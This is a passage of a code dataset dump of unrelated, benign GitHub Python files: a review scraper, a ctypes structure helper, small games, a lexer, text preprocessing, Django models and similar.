response.meta['page'] == 1:\n total_reviews = search(r'\\d+', response.css(\"h2.titlebar-title::text\").extract_first())\n total_reviews = int(total_reviews.group(0)) if total_reviews else 0\n \n # On lance une requete pour chacune des pages\n # +1 pour le reste et +1 parce que l'intervalle de range est ouvert à droite\n for page in range(2, int(total_reviews/self.reviews_per_page)+2):\n url = urljoin(response.url, f\"?page={page}\")\n response.meta['page'] = 2\n \n yield Request(url=url, callback=self.parse_reviews, meta=response.meta, headers=self.headers)\n \n\n\n \n","repo_name":"FridIsar/films-data-science","sub_path":"autres/sentiment analysis/datasets/spiders/reviews_allocine.py","file_name":"reviews_allocine.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"32196708369","text":"import ctypes\nfrom typing import List, Tuple, Type\n\nfrom .ints import (\n Int8,\n Int16,\n Int32,\n Int64,\n IntTypeBase,\n MultipliedIntTypeBase,\n UInt8,\n UInt16,\n UInt32,\n UInt64,\n)\n\n__all__ = [\"Structure\"]\n\nmapping = {\n Int8: ctypes.c_byte,\n UInt8: ctypes.c_ubyte,\n Int16: ctypes.c_short,\n UInt16: ctypes.c_ushort,\n Int32: ctypes.c_int,\n UInt32: ctypes.c_uint,\n Int64: ctypes.c_longlong,\n UInt64: ctypes.c_ulonglong,\n}\n\n\nclass Structure(object):\n _pack_ = 0\n _fields_: List[Tuple[str, Type]] = []\n\n def __init__(self):\n self.subfields, fields = {}, []\n for field, type_ in self._fields_:\n if isinstance(type_, int):\n type_ = ctypes.c_char * type_\n elif issubclass(type_, IntTypeBase):\n if issubclass(type_, MultipliedIntTypeBase):\n type_ = mapping[type_.int_type] * type_.mul\n else:\n type_ = mapping[type_]\n elif issubclass(type_, Structure):\n # Keep track, likely for Python GC purposes.\n self.subfields[field] = type_()\n type_ = self.subfields[field].Klass\n fields.append((field, type_))\n\n class Klass(ctypes.Structure):\n _pack_ = self._pack_\n _fields_ = fields\n\n def as_dict(self):\n return self._parent_.as_dict()\n\n self.Klass = Klass\n self.Klass._parent_ = self\n\n def __getattr__(self, item):\n ret = getattr(self._values_, item)\n if isinstance(ret, ctypes.Structure):\n ret._parent_._values_ = ret\n\n # Allow caller to omit the [:] part.\n if hasattr(ret, \"__getitem__\"):\n return ret[:]\n return ret\n\n def as_dict(self, values=None):\n ret = {}\n for field, type_ in self._fields_:\n value = getattr(values or self._values_, field)\n if isinstance(type_, type) and issubclass(type_, Structure):\n ret[field] = value._parent_.as_dict(value)\n elif hasattr(value, \"__getitem__\"):\n ret[field] = value[:]\n else:\n ret[field] = value\n return ret\n\n @classmethod\n def sizeof(cls):\n return ctypes.sizeof(cls().Klass)\n\n @classmethod\n def from_buffer_copy(cls, buf):\n obj = cls()\n obj._values_ = obj.Klass.from_buffer_copy(buf)\n return obj\n\n @classmethod\n def parse(cls, buf):\n return cls.from_buffer_copy(buf)\n","repo_name":"CERT-Polska/malduck","sub_path":"malduck/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"61"} +{"seq_id":"30991166098","text":"from py_avataaars import PyAvataaar \r\n\r\navatar = PyAvataaar()\r\navatar.render_png_file(\"AVATAR_1.png\")\r\n\r\nimport py_avataaars as pa \r\n\r\navatar = pa.PyAvataaar(style=pa.AvatarStyle.CIRCLE,\r\n skin_color=pa.SkinColor.LIGHT,\r\n hair_color=pa.HairColor.AUBURN,\r\n facial_hair_type=pa.FacialHairType.MOUSTACHE_MAGNUM,\r\n top_type=pa.TopType.SHORT_HAIR_SHAGGY_MULLET,\r\n mouth_type=pa.MouthType.SCREAM_OPEN,\r\n eye_type=pa.EyesType.SQUINT,\r\n eyebrow_type=pa.EyebrowType.RAISED_EXCITED_NATURAL,\r\n nose_type=pa.NoseType.DEFAULT,\r\n accessories_type=pa.AccessoriesType.PRESCRIPTION_02,\r\n clothe_type=pa.ClotheType.HOODIE,\r\n clothe_graphic_type=pa.ClotheGraphicType.BAT,)\r\n\r\navatar.render_png_file(\"AVATAR_2.png\")\r\n#© 2021 Proxlight, Inc. All rights reserved.","repo_name":"Proxlight/Create-Avatars","sub_path":"Avatar.py","file_name":"Avatar.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"14992904828","text":"import sys\n\nfrom functools import reduce\nfrom operator import add, mul\n\ndef hex_to_binary(input):\n output = bin(int(input, 16))[2:]\n return \"0\"*(len(input)*4 - len(output)) + output\n\ndef parse_packet(binary):\n # Returned values (includes composition of sub-packets)\n numbers = []\n cur_offset = 0\n sum_versions = 0\n\n V = int(binary[:3], 2)\n sum_versions += V\n T = int(binary[3:6], 2)\n\n # Type of 4 represents a literal number.\n if T == 4:\n all_parts = []\n start = 6\n while True:\n all_parts.append(binary[start+1:start+5])\n if binary[start] == \"0\":\n break\n start = start + 5\n numbers.append(int(\"\".join(all_parts), 2))\n return numbers, start + 5, V\n else:\n I = int(binary[6], 2)\n if I == 0:\n L = int(binary[7:22], 2)\n cur_offset = 22\n while cur_offset < 22 + L:\n vals, offset, version = parse_packet(binary[cur_offset:])\n sum_versions += version\n cur_offset = cur_offset + offset\n for val in vals:\n numbers.append(val)\n else:\n L = int(binary[7:18], 2)\n i = 0\n cur_offset = 18\n while i < L:\n vals, offset, version = parse_packet(binary[cur_offset:])\n sum_versions += version\n cur_offset = cur_offset + offset\n i += 1\n for val in vals:\n numbers.append(val)\n if T == 0:\n return [reduce(add, numbers)], cur_offset, sum_versions\n elif T == 1:\n return [reduce(mul, numbers)], cur_offset, sum_versions\n elif T == 2:\n return [reduce(min, numbers)], cur_offset, sum_versions\n elif T == 3:\n return [reduce(max, numbers)], cur_offset, sum_versions\n elif T == 5:\n return [1 if numbers[0] > numbers[1] else 0], cur_offset, sum_versions\n elif T == 6:\n return [1 if numbers[0] < numbers[1] else 0], cur_offset, sum_versions\n elif T == 7:\n return [1 if numbers[0] == numbers[1] else 0], cur_offset, sum_versions\n\ndef main():\n for line in sys.stdin:\n vals, offset, sum_versions = parse_packet(hex_to_binary(line.strip()))\n print(vals[0])\n # print(sum_versions)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"teejusb/advent-of-code-2021","sub_path":"16/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14650363042","text":"import turtle\r\nimport random\r\n\r\npen = turtle.Turtle()\r\nturtle.colormode(255)\r\npen.speed(\"fastest\")\r\npen.hideturtle()\r\n#pen.width = 50\r\n\r\n#rgb_color = []\r\n#colors = colorgram.extract(\"20_001.jpg\", 10)\r\n#for color in colors:\r\n# r = color.rgb.r\r\n# g = color.rgb.g\r\n# b = color.rgb.g\r\n# new_colors = (r, g, b)\r\n# rgb_color.append(new_colors)\r\n\r\n#print(rgb_color)\r\n\r\ncolors = [(199, 175, 175), (124, 36, 36), (168, 106, 106), (222, 224, 224), (186, 158, 158), (6, 57, 57), (109, 67, 67)]\r\n\r\ndef clors():\r\n # for spec_color in colors:\r\n color = random.choice(colors)\r\n return color\r\n\r\ndef draw(space, x, y):\r\n #color = ()\r\n for i in range(y):\r\n for j in range(x):\r\n pen.dot(20, clors())\r\n pen.penup()\r\n #move forward by a specified distance \"space\"\r\n pen.forward(50)\r\n pen.pendown()\r\n pen.penup()\r\n pen.back(space * x)\r\n pen.lt(90)\r\n pen.forward(space)\r\n pen.rt(90)\r\n pen.pendown()\r\n\r\n\r\npen.setheading(225)\r\npen.penup()\r\npen.forward(7 * 50)\r\npen.setheading(0)\r\npen.pendown()\r\n\r\ndraw(50, 10, 10)\r\nscreen = turtle.Screen()\r\nscreen.exitonclick()\r\n\r\n","repo_name":"umole/heist-painting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40130247357","text":"# -*- coding:ascii -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1428195607.203475\n_enable_loop = True\n_template_filename = 'C:\\\\Python34\\\\Projects\\\\CHF\\\\homepage\\\\templates/rentable_item.html'\n_template_uri = 'rentable_item.html'\n_source_encoding = 'ascii'\nimport os, os.path, re\n_exports = ['title', 'header', 'content']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n def title():\n return render_title(context._locals(__M_locals))\n all_item = context.get('all_item', UNDEFINED)\n def header():\n return render_header(context._locals(__M_locals))\n def content():\n return render_content(context._locals(__M_locals))\n __M_writer = context.writer()\n __M_writer('\\r\\n\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'title'):\n context['self'].title(**pageargs)\n \n\n __M_writer('\\r\\n\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'content'):\n context['self'].content(**pageargs)\n \n\n __M_writer('\\r\\n\\r\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'header'):\n context['self'].header(**pageargs)\n \n\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_title(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def title():\n return render_title(context)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\tRentable Items\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_header(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def header():\n return render_header(context)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\tContact the Colonial Heritage Foundation\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_content(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n all_item = context.get('all_item', UNDEFINED)\n def content():\n return render_content(context)\n __M_writer = context.writer()\n __M_writer('\\r\\n\\r\\n\\t\\r\\n\\t\\t\\r\\n\\t\\t\\t

Rentable Items

\\r\\n\\t\\t\\t
\\r\\n\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t Create New Rentable Item\\r\\n\\t\\t\\t
\\r\\n\\t\\t\\t
\\r\\n\\t\\t\\t\\r\\n\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\r\\n\\r\\n\\r\\n\\t\\t\\t\\t\\t\\t\\t\\r\\n')\n for item in all_item:\n __M_writer('\\r\\n\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\t\\t\\t\\t\\t\\t\\r\\n\\r\\n\\t\\t\\t\\t\\t\\r\\n\")\n __M_writer('\\r\\n\\t\\t\\t
IDNameConditionNew DamageDamage FeeDue DateLate FeeDescriptionActions
')\n __M_writer(str(item.id))\n __M_writer('')\n __M_writer(str(item.name))\n __M_writer('')\n __M_writer(str(item.condition))\n __M_writer('')\n __M_writer(str(item.newDamage))\n __M_writer('')\n __M_writer(str(item.damageFee))\n __M_writer('')\n __M_writer(str(item.dueDate))\n __M_writer('')\n __M_writer(str(item.lateFee))\n __M_writer('')\n __M_writer(str(item.description))\n __M_writer('Edit\\r\\n\\t\\t\\t\\t\\t\\t|\\r\\n\\t\\t\\t\\t\\t\\t Delete
\\r\\n\\tGenerate overdue report\\r\\n\\t30 Days\\r\\n\\t60 Days\\r\\n\\t90+ Days\\r\\n\\tSend Overdue Emails\\r\\n\\r\\n\\r\\n\\r\\n\\t\\r\\n\\r\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"line_map\": {\"65\": 3, \"107\": 41, \"71\": 62, \"108\": 41, \"77\": 62, \"112\": 44, \"83\": 7, \"90\": 7, \"91\": 31, \"92\": 32, \"93\": 34, \"94\": 34, \"95\": 35, \"96\": 35, \"97\": 36, \"98\": 36, \"27\": 0, \"100\": 37, \"101\": 38, \"102\": 38, \"39\": 1, \"104\": 39, \"105\": 40, \"106\": 40, \"103\": 39, \"44\": 5, \"109\": 42, \"110\": 42, \"111\": 44, \"99\": 37, \"49\": 60, \"113\": 48, \"119\": 113, \"59\": 3}, \"filename\": \"C:\\\\Python34\\\\Projects\\\\CHF\\\\homepage\\\\templates/rentable_item.html\", \"source_encoding\": \"ascii\", \"uri\": \"rentable_item.html\"}\n__M_END_METADATA\n\"\"\"\n","repo_name":"blakewoodward1/intex2","sub_path":"homepage/cached_templates/templates/rentable_item.html.py","file_name":"rentable_item.html.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23568533491","text":"import sys\n\nsys.stdout = open(\"./output.txt\", \"w\")\n\nt = int(input())\nfor i in range(1, t + 1):\n bigchunk, peoplenum = [int(s) for s in raw_input().split(\" \")]\n totalchunks = [bigchunk]\n mx = mn = 0\n for j in range(1, peoplenum + 1):\n if bigchunk <= 1:\n mx = mn = 0\n else:\n if bigchunk % 2 == 0:\n mx = bigchunk / 2\n mn = mx - 1\n else:\n mx = mn = bigchunk / 2\n totalchunks.append(mx)\n totalchunks.append(mn)\n totalchunks.remove(bigchunk)\n bigchunk = max(totalchunks)\n\n print(\"Case #{}: {} {}\".format(i,mx,mn))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1836.py","file_name":"1836.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39119157059","text":"from string import Template\n\n\nclass Content:\n def __init__(self, title, body):\n self.title = title\n self.body = ContentBody().make(body)\n\n\nclass ContentBody:\n def __init__(self):\n self.__header = '' \\\n ''\n self.__body_template = Template('$body')\n\n def make(self, body):\n return self.__header + self.__body_template.substitute(body=body)\n\n\ndef make_contents_from_message(messages, title_prefix=''):\n result = []\n for key in messages.keys():\n body = ''\n for value in messages[key]:\n body += f'{value}
'\n content = Content(f'{title_prefix}_{key}', body)\n result.append(content)\n\n return result\n","repo_name":"gwanos/evernotemaster","sub_path":"evernotecore/contents.py","file_name":"contents.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15157982117","text":"from typing import Set\n\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\n\ndef remove_stop_words(df: pd.DataFrame, column: str, stopwords: Set) -> pd.DataFrame:\n token_column: str = \"__itsml_tokens\"\n df[token_column] = df[column].str.split()\n df[column] = df[token_column].apply(\n lambda tokens: \" \".join([token for token in tokens if token not in stopwords])\n )\n df = df.drop(columns=[token_column])\n return df\n\n\ndef lowercase(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.lower()\n return df\n\n\ndef remove_number(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.replace(r\"\\d+\", \" \", regex=True)\n return df\n\n\ndef remove_accents(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = (\n df[column]\n .str.normalize(\"NFKD\")\n .str.encode(\"ascii\", errors=\"ignore\")\n .str.decode(\"utf-8\")\n )\n return df\n\n\ndef remove_diacritics(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.replace(\"[^a-zA-Z]+\", \" \", regex=True)\n return df\n\n\ndef remove_small_tokens(\n df: pd.DataFrame, column: str, min_token_size: int\n) -> pd.DataFrame:\n regex = r\"\\b\" + r\"\\w{0,\" + str(min_token_size) + r\"}\\b\"\n df[column] = df[column].str.replace(regex, \" \", regex=True)\n return df\n\n\ndef remove_extra_spaces(df: pd.DataFrame, column: str) -> pd.DataFrame:\n df[column] = df[column].str.replace(r\" +\", \" \", regex=True).str.strip()\n return df\n\n\ndef default_text_preprocessing_pipeline(\n df: pd.DataFrame, stopwords: Set[str], column: str, min_token_size: int = 0\n) -> pd.DataFrame:\n df = (\n df.pipe(lowercase, column=column)\n .pipe(remove_number, column=column)\n .pipe(remove_accents, column=column)\n .pipe(remove_diacritics, column=column)\n .pipe(remove_small_tokens, column=column, min_token_size=min_token_size)\n .pipe(remove_extra_spaces, column=column)\n .pipe(remove_stop_words, column=column, stopwords=stopwords)\n )\n return df\n\n\nclass TextNormalizationTransformer(BaseEstimator, TransformerMixin):\n def __init__(self, stopwords: Set[str], min_token_size: int = 0):\n self.stopwords = stopwords\n self.column = \"__itsml_temp\"\n self.min_token_size = min_token_size\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n df = pd.DataFrame({self.column: X}, dtype=str)\n default_text_preprocessing_pipeline(\n df, self.stopwords, self.column, self.min_token_size\n )\n return df[self.column].values\n","repo_name":"itsmeale/itsml","sub_path":"itsml/preprocessing/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12341312647","text":"from django.conf.urls import url\n#이번시간에는 app별로 url을 관리할 수 있도록 한다\n#그래서 새로운 urls.py를 만듦\n# photos/urls.py\n\nfrom . import views\n\n\napp_name = 'photos'\n\nurlpatterns = [\n url(r'^(?P[0-9]+)/like/$', views.like_photo, name='like_photo'),\n url(r'^(?P[0-9]+)/$', views.view_photo, name='view_photo'),\n url(r'^$', views.toppage, name='toppage'),\n]\n","repo_name":"jarangseo/pystagram-jarang","sub_path":"instablog-jarang/photos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4707200251","text":"#import all necassary packages\nimport cv2\nfrom cv2 import CascadeClassifier\n\n#cascade file\nclassifier=cv2.CascadeClassifier('data/haarcascade_frontalface_default.xml')\ncap=cv2.VideoCapture(0)\n\n#while loop for capture of vedio in form of numerous frames of images\nwhile True:\n\n\tret,frame=cap.read() #read the frame\n\n\t#convert frame to gray scale\n\tframe=cv2.cvtColor(frame,0)\n\tdetections=classifier.detectMultiScale(frame,1.3,5) #this function detect the face from classifier\n\tif(len(detections)>0):\n\t\t(x,y,w,h)=detections[0]\n\t\tframe=cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2) #make a rectangle arounf the detected face\n\tcv2.imshow('frame',frame)\n\n\tif cv2.waitKey(1) & 0xff ==ord('q'): #by pressing 'q' we can quit the program\n\t\tbreak\n","repo_name":"Pranjul2002/faceDetection","sub_path":"faceDetection.py","file_name":"faceDetection.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25908023806","text":"#program for accepting number and print that number of \"*\"\r\n\r\n\r\n#accepting number from user\r\nnum=int(input(\"enter number\"))\r\n\r\n#function defination\r\ndef displaystar(x):\r\n for a in range(x):\r\n print(\"*\",end=\" \")\r\n \r\n\r\n#function call\r\ndisplaystar(num)\r\n","repo_name":"baigarkalpana/Python_Numbers","sub_path":"Problems_on_Numbers/printstars.py","file_name":"printstars.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21809833015","text":"#Proyecto Final - Compiladores\n#Autores: Carmelo Ramirez (A01175987) y Juan Pablo Galaz (A01251406)\n\nimport ply.lex as lex\nimport sys\n\n#------------- LEXICO DEL LENGUAJE ----------\n#TOKENS VALIDOS EN EL LENGUAJE.\ntokens = [\n 'ID',\n 'CTE_I',\n 'CTE_F',\n 'CTE_STR',\n 'BRADER',\n 'BRAIZQ',\n 'CORDER',\n 'CORIZQ',\n 'PARDER',\n 'PARIZQ',\n 'PUNTCOM',\n 'DIF',\n 'MENOR',\n 'MAYOR',\n 'MENIGUAL',\n 'MAYIGUAL',\n 'IGUAL',\n 'AND',\n 'OR',\n 'SUMA',\n 'RESTA',\n 'DIV',\n 'MOD',\n 'MULT',\n 'ASIG',\n 'COMA',\n 'PUNTO'\n]\n\n\n#PALABRAS RESERVADAS PARA EL LENGUAJE.\npalabrasReservadas = {\n 'if' : 'IF',\n 'else' : 'ELSE',\n 'repeat' : 'REPEAT',\n 'module' : 'MODULE',\n 'import': 'IMPORT',\n 'height': 'HEIGHT',\n 'width': 'WIDTH',\n 'canvas' : 'CANVAS',\n 'print' : 'PRINT',\n 'input' : 'INPUT',\n 'forward' : 'FORWARD',\n 'background': 'BACKGROUND',\n 'backward' : 'BACKWARD',\n 'left' : 'LEFT',\n 'main' : 'MAIN',\n 'right' : 'RIGHT',\n 'turn' : 'TURN',\n 'up' : 'UP',\n 'down' : 'DOWN',\n 'return' : 'RETURN',\n 'circle' : 'CIRCLE',\n 'triangle' : 'TRIANGLE',\n 'square' : 'SQUARE',\n 'ngon' : 'NGON',\n 'arc' : 'ARC',\n 'fill' : 'FILL',\n 'color' : 'COLOR',\n 'rotate' : 'ROTATE',\n 'stretch' : 'STRETCH',\n 'size' : 'SIZE',\n 'int' : 'INT',\n 'float' : 'FLOAT',\n 'void' : 'VOID',\n}\n\n\n#AGREGAMOS LAS PALABRAS RESERVADAS A LA LISTA DE TOKENS.\ntokens += palabrasReservadas.values()\n\n\n#REGLA PARA DETECTAR TIPO DE CONSTANTE NUMERICA DECIMAL.\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n if t.value in palabrasReservadas:\n t.type = palabrasReservadas[t.value]\n return t\n\n\n#REGLA PARA DETECTAR CONSTANTES NUMERICAS DECIMALES.\ndef t_CTE_F(t):\n r'\\d+\\.\\d+'\n t.value = float(t.value)\n return t\n\n\n#REGLA PARA DETECTAR CONSTATNES NUMERICAS ENTERAS.\ndef t_CTE_I(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\n#REGLA PARA DETECTAR CONSTANTES DE TEXTO.\ndef t_CTE_STR(t):\n r'\\\"[^\\\"\\~]*\\\"'\n return t\n\n#REGLA PARA IGNORAR COMMENTARIO.\ndef t_COMMENT(t):\n r'\\#[^\\#]*\\#'\n pass\n\n#REGLA PARA CONTAR EL NUMBERO DE LINEA.\ndef t_NEWLINE(t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n\n#REGLAS PARA DETECTAR CARACTERES ESPECIALES.\nt_BRADER = r'\\}'\nt_BRAIZQ = r'\\{'\nt_CORDER = r'\\]'\nt_CORIZQ = r'\\['\nt_PARDER = r'\\)'\nt_PARIZQ = r'\\('\nt_PUNTCOM = r'\\;'\nt_DIF = r'\\!\\='\nt_MENOR = r'\\<'\nt_MAYOR = r'\\>'\nt_MENIGUAL = r'\\<\\='\nt_MAYIGUAL = r'\\>\\='\nt_IGUAL = r'\\=\\='\nt_AND = r'\\&'\nt_OR = r'\\|'\nt_SUMA = r'\\+'\nt_RESTA = r'\\-'\nt_DIV = r'\\/'\nt_MOD = r'\\%'\nt_MULT = r'\\*'\nt_ASIG = r'\\='\nt_COMA = r'\\,'\nt_PUNTO = r'\\.'\nt_ignore = ' \\t'\n\n\n#MENSAJE DE ERROR.\ndef t_error(t):\n print(\"Invalid character %s at line number, %s\" %(t.value[0], t.lexer.lineno))\n t.lexer.skip(1)\n sys.exit()\n\n\n#CREACION DE INSTANCIA DE LEXER.\nlexer = lex.lex()\n\n\n# FUNCION ADICIONAL PARA VER LOS TOKENS DENTRO DE UNA CADENA.\ndef verTokens(entrada):\n lexer.input(entrada)\n token = lexer.token()\n while (token is not None):\n print(token)\n token = lexer.token()","repo_name":"carmelormz/ProyectoFinalCompiladores","sub_path":"ProyectoFinal_Lex.py","file_name":"ProyectoFinal_Lex.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35369028185","text":"import pygame\r\npygame.init()\r\n\r\n\r\nsize = [600, 400]\r\n\r\ndisplay = pygame.display.set_mode(size)\r\n\r\nclock = pygame.time.Clock()\r\nFPS = 30\r\n\r\nwhite = (255, 255, 255)\r\nred = (255, 0, 0)\r\nyellow = (240, 230, 170)\r\n\r\ncar_surf = pygame.image.load('images/car.bmp').convert()\r\ncar_surf = pygame.transform.scale(car_surf,\r\n (car_surf.get_width() // 3,\r\n car_surf.get_height() // 3))\r\nfinish_surf = pygame.image.load('images/finish.png')\r\nbackground = pygame.image.load('images/sand.jpg').convert()\r\n\r\ncar_surf.set_colorkey(white)\r\ncar_rect = car_surf.get_rect(center=(size[0] / 2, size[1] / 2))\r\n\r\nbackground = pygame.transform.scale(background,\r\n (background.get_width() // 3,\r\n background.get_height() // 3))\r\n\r\n\r\n\r\ncar_up = car_surf\r\ncar_down = pygame.transform.flip(car_surf, False, True)\r\ncar_left = pygame.transform.rotate(car_surf, 90)\r\ncar_right = pygame.transform.flip(car_left, True, False)\r\ncar_rightup = pygame.transform.rotate(car_surf, -45)\r\ncar_rightdown = pygame.transform.rotate(car_surf, -135)\r\ncar_leftup = pygame.transform.rotate(car_surf, 45)\r\ncar_leftdown = pygame.transform.rotate(car_surf, 135)\r\ncar = car_up\r\nleft = right = down = False\r\nup = True\r\nspeed = 5\r\n\r\nwhile True:\r\n clock.tick(FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n key = pygame.key.get_pressed()\r\n\r\n if key[pygame.K_a]:\r\n left = True\r\n car = car_left\r\n car_rect.x -= speed\r\n if car_rect.x < 0:\r\n car_rect.x = 0\r\n else:\r\n left = False\r\n\r\n if key[pygame.K_d]:\r\n right = True\r\n car = car_right\r\n car_rect.x += speed\r\n if car_rect.right > size[0]:\r\n car_rect.right = size[0]\r\n else:\r\n right = False\r\n\r\n if key[pygame.K_w]:\r\n up = True\r\n car = car_up\r\n car_rect.y -= speed\r\n if car_rect.y < 0:\r\n car_rect.y = 0\r\n else:\r\n up = False\r\n\r\n if key[pygame.K_s]:\r\n down = True\r\n car = car_down\r\n car_rect.y += speed\r\n if car_rect.bottom > size[1]:\r\n car_rect.bottom = size[1]\r\n else:\r\n down = False\r\n\r\n if up and right:\r\n car = car_rightup\r\n if up and left:\r\n car = car_leftup\r\n if down and right:\r\n car = car_rightdown\r\n if down and left:\r\n car = car_leftdown\r\n\r\n car_rect = car.get_rect(center=(car_rect.center))\r\n\r\n\r\n display.blit(background, (0, 0))\r\n display.blit(finish_surf, (0, 0))\r\n display.blit(car, car_rect)\r\n pygame.display.update()\r\n\r\n","repo_name":"Skyt1ess/PyGame_15_06","sub_path":"4/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16900174074","text":"from datetime import datetime\n\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\n\nfrom api_yamdb.settings import MAX_NAME_LENGTH, TRUNCATE_LENGTH\nfrom user.models import User\n\n\nclass Category(models.Model):\n \"\"\"Категории (типы) произведений\"\"\"\n\n name = models.CharField('имя категории', max_length=MAX_NAME_LENGTH)\n slug = models.SlugField('слаг категории', unique=True, db_index=True)\n\n class Meta:\n ordering = ('name',)\n verbose_name = 'категория'\n verbose_name_plural = 'категории'\n\n def __str__(self):\n return (\n self.name[:TRUNCATE_LENGTH] + '...'\n if len(self.name) > TRUNCATE_LENGTH\n else self.name\n )\n\n\nclass Genre(models.Model):\n \"\"\"Жанры произведений\"\"\"\n\n name = models.CharField('имя жанра', max_length=MAX_NAME_LENGTH)\n slug = models.SlugField('cлаг жанра', unique=True, db_index=True)\n\n class Meta:\n ordering = ('name',)\n verbose_name = 'жанр'\n verbose_name_plural = 'жанры'\n\n def __str__(self):\n return (\n self.name[:TRUNCATE_LENGTH] + '...'\n if len(self.name) > TRUNCATE_LENGTH\n else self.name\n )\n\n\nclass Title(models.Model):\n \"\"\"Произведения\"\"\"\n\n name = models.CharField(\n 'название',\n max_length=MAX_NAME_LENGTH,\n db_index=True,\n )\n year = models.SmallIntegerField(\n 'год',\n validators=(\n MaxValueValidator(\n limit_value=datetime.now().year,\n message='год выпуска не может превышать текущий год',\n ),\n ),\n )\n category = models.ForeignKey(\n Category,\n on_delete=models.SET_NULL,\n related_name='titles',\n verbose_name='категория',\n null=True,\n blank=True,\n )\n description = models.TextField(\n 'описание',\n blank=True,\n )\n genre = models.ManyToManyField(\n Genre,\n related_name='titles',\n verbose_name='жанр',\n )\n\n class Meta:\n verbose_name = 'произведение'\n verbose_name_plural = 'произведения'\n ordering = ('name',)\n\n def 